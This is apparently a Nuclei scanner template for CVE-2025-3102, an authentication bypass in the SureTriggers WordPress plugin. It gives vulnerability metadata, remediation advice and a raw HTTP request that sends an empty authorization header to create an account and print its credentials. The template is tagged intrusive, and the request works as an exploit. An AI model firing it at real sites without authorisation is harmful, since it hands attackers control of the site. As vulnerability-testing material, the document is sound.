id: CVE-2025-3102

info:
  name: SureTriggers – All-in-One Automation Platform ≤ 1.0.78 - Authentication Bypass
  author: DhiyaneshDK
  severity: high
  description: |
    The SureTriggers- All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_user' function in all versions up to, and including, 1.0.78. This makes it possible for unauthenticated attackers to create administrator accounts on the target website when the plugin is installed and activated but not configured with an API key.
  impact: |
    Unauthenticated attackers can create administrator accounts when the SureTriggers plugin is installed but not configured with an API key, gaining complete control over the WordPress site.
  remediation: |
    Upgrade to SureTriggers version 1.0.79 or later that properly validates the secret_key parameter.
  reference:
    - https://plugins.trac.wordpress.org/browser/suretriggers/trunk/src/Controllers/RestController.php#L59
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve
    - https://github.com/Nxploited/CVE-2025-3102
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2025-3102
    cwe-id: CWE-697
    epss-score: 0.83531
    epss-percentile: 0.99298
  metadata:
    verified: true
    max-request: 1
    public-query: "/wp-content/plugins/suretriggers"
  tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        st_authorization:

        {"integration": "WordPress", "type_event": "create_user_if_not_exists", "selected_options": {"user_email": "{{email}}", "user_name": "{{username}}", "password": "{{password}}"}, "fields": [], "context": {}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"user_registered":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + " Password: " + password'
# digest: 4b0a00483046022100f2f4a2d7a2bb77ea77789fa455c7ae2748be9a657854bbac2b908c1298520f44022100c4d636a1a7159cff1dedffd450c9c3935bc90cb9a96715d4c257d327e6b64acb:922c64590222798bb761d5b6d8e72950